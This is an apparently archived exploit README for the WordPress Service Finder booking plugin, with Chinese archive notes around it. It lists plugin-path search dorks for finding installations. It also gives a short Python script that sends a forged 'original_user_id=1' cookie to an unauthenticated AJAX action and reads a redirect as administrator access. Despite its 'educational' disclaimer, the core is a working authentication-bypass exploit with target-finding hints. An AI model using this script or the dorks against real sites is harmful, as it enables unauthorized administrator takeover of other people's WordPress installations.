关联漏洞
Description
An mini exploit for the Service Finder -Bookings plugin WP
介绍
# 🔍 WordPress Plugin Exploit — Service Finder (sf-booking)
## Overview
The **Service Finder** plugin is a booking and service management system for WordPress.
Because of its popularity and complexity, some versions have had security issues related to **unauthenticated AJAX endpoints** or improper access controls.
This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).
---
## Vulnerable WP dorks
`/wp-content/plugins/service-finder/`
`/wp-content/plugins/service-finder-bookings/`
`/wp-content/plugins/sf-booking/`
---
## Exploit Workflow
> ⚠️ **Disclaimer:**
> These searches are for **educational** and **research** use only. Do **not** attempt unauthorized access or exploitation.
```python
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
```
* `300-399`: ✅ VULN ! Redirect to admin panel as ADMIN
* `400-499`: ⚠️ Client error — the request was invalid or unauthorized, not vuln
---
## References
- WPScan Plugin Database — https://wpscan.com/plugins/
- National Vulnerability Database (NVD) — https://nvd.nist.gov/
- OWASP — Google Dorking / reconnaissance techniques
- HackerOne Disclosure Guidelines — https://www.hackerone.com/disclosure-guidelines
---
## Author
**[Taha Mounir](https://github.com/M4rgs)**
---
文件快照
[4.0K] /data/pocs/7bdb5900e0256c84c12eb11efe78666a73165a9c
└── [1.5K] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。